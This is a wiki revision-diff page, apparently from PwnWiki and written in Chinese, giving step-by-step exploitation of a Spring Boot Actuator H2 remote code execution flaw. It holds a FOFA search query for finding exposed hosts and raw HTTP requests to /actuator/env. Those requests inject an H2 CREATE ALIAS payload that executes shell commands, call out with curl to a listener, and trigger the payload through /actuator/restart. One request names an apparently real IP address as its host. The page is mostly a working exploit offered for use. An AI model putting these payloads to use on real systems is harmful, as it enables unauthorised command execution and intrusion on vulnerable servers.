Difference between revisions of "Spring Boot Actuator H2 RCE漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Spring Boot < 1.5 Spring Boot >= 1.5 </pre> ==FOFA== <pre> body="Whitelabel Error Page" </pre> <translate> ==...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 14: | Line 14: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
訪問以下URL: | 訪問以下URL: | ||
</translate> | </translate> | ||
| Line 23: | Line 24: | ||
</pre> | </pre> | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
發送如下POST包配置spring.datasource.hikari.connection-test-query的值。 | 發送如下POST包配置spring.datasource.hikari.connection-test-query的值。 | ||
</translate> | </translate> | ||
| Line 34: | Line 36: | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
NC監聽,向端點 /actuator/restart 發送POST請求, 重啟應用。 | NC監聽,向端點 /actuator/restart 發送POST請求, 重啟應用。 | ||
</translate> | </translate> | ||
Latest revision as of 09:24, 13 June 2021
漏洞影響
Spring Boot < 1.5 Spring Boot >= 1.5
FOFA
body="Whitelabel Error Page"
漏洞利用
訪問以下URL:
http://x.x.x.x:port/actuator
發送如下POST包配置spring.datasource.hikari.connection-test-query的值。
POST /actuator/env HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json
Content-Length: 389
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl x.x.x.x:port');"}
NC監聽,向端點 /actuator/restart 發送POST請求, 重啟應用。
POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356
{}
